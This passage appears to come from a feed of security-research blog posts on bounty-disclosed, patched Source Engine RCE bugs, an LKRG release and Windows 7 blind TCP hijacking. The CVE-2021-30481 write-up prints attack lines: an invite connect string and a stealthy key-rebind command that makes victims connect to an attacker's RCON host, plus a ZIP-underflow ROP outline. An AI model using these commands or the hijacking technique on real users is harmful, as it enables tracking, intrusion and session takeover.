  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got involved obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit was very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kind of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

image-20180802185147009
Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and the Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series’ in history, including Half-Life, Team Fortress, Portal, and Counter Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for their current engine versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consists of two separate parts, the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and custom formats is fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike the CTF, its implications of a full client machine compromise in a series of games with a huge player base leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the service. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

CVE-2021-30481: Source engine remote code execution via game invites

By: floesen
20 April 2021 at 00:00

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image 1 shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my github. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers making the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve seems to now use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. After all, at least a warning is displayed that shows the parameters your game is about to start with for those games. The next image shows how such a warning would look like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. Personally, it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure about the existence of this bug has caused quite a stir regarding Valve’s slow response times to bugs. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run too. The efforts that other researchers have put and are going to put into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

LKRG 0.9.0 has been released!

By: pi3
12 April 2021 at 21:54

During LKRG development and testing I’ve found 7 Linux kernel bugs, 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

  • Deadlock issue which was not really addressed and devs said they will take a look and there is not much updates on that.
  • Problem with the code related to hwlatd kernel thread – it is incorrectly synchronizing with launcher / killer of it. You can have WARN in kernels all the time.

CVE-2021-3411 refers to 2 different type of bugs:

  • Broken KRETPROBE (recently reported)
  • Incompatibility of KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug with the kernel signal handling in dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

However, I don’t remember if I found it during my work related to LKRG so I’m not counting it here (otherwise it would be total 8 bugs while 5 of them would have CVE).

That’s pretty bad stats… However, it might be an interesting story to say during LKRG announcement of the new version. It could be also interesting talk for conference.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

Windows 7 TCP/IP hijacking

By: pi3
24 January 2021 at 18:18

Blind TCP/IP hijacking is still alive on Windows 7… and not only. This version of Windows is certainly one of the “juiciest” targets even though January 14th 2020 was the official EOL (End Of Life) for it. Based on various data Windows 7 holds around 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform blind TCP/IP hijacking attack. This tool was exploiting exactly the same weaknesses in TCP/IP stack which I’ve reported. That being said, Microsoft informed me that if I share my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addresses in Windows 8.

In the next months I started my work as FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8.  Over the course of years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanups on my old laptop and found my old tool. I copied it from the laptop and decided to re-visit it once I will have a bit more time. I found some time and thought that my tool deserves a release and a proper description.

What is TCP/IP hijacking?

Most likely majority of the readers are aware what this is. For those who don’t, I encourage you to read many great articles about it which you can find on the internet these days.

It might be worth to mention that probably the most famous blind TCP/IP hijacking attack was done by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initials TCP sequence numbers (ISN).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately it is not as catastrophic as it used to be. The main reason is that majority of the modern protocols do implement encryption. Sure, it’s overwhelmingly bad if attacker can hijack any TCP/IP session which is established. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it. Unless they have ability to correctly generate encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 was implementing a known attack described by ‘lkm’ (there is a typo and real nickname of the author is ‘klm’) in Phrack 64 magazine and can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully on many modern OS (modern at that time) including Windows 2K/XP or FreeBSD 4. I gave a live presentation of this attack against Windows XP on a local conference in Poland (SysDay 2009).

Before we move to the details on how to perform described attack, it is useful to refresh how TCP handles the communication in more details. Quoting phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.

The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT.
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

  • Client IP
  • Server IP (usually known)
  • Client port
  • Server port (usually known)
  • Sequence number of the client
  • Sequence number of the server

OK, but what it has to do with IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted in the Bugtraq mailing list a description of a new port scanning technique which is known today as an “Idle scan”. Original post can be found here:

https://seclists.org/bugtraq/1998/Dec/79

and more information about Idle scan you can read here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]

This essentially creates some form of “covert channel” which can be exploited by remote attacker to “discover” all the necessary information to execute TCP/IP Hijacking attack. How? Let’s quote the original phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When attacker guessed the valid client’s port, server replies to the real client (not attacker) with ACK. If port was incorrect, server replies to the real client with SYN+ACK. A real client didn’t start a new connection so it replies to the server with RST.

So, all we have to do to test if a guessed client-port is the correct one
is:

– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.

Finding the server’s SND.NEXT

This is the essential part, and the best what I can do is to quote (again) phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:

A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at last).

A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).

It is important to node that the sequence number space is “circular”. For exemple, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.

Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.

If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.

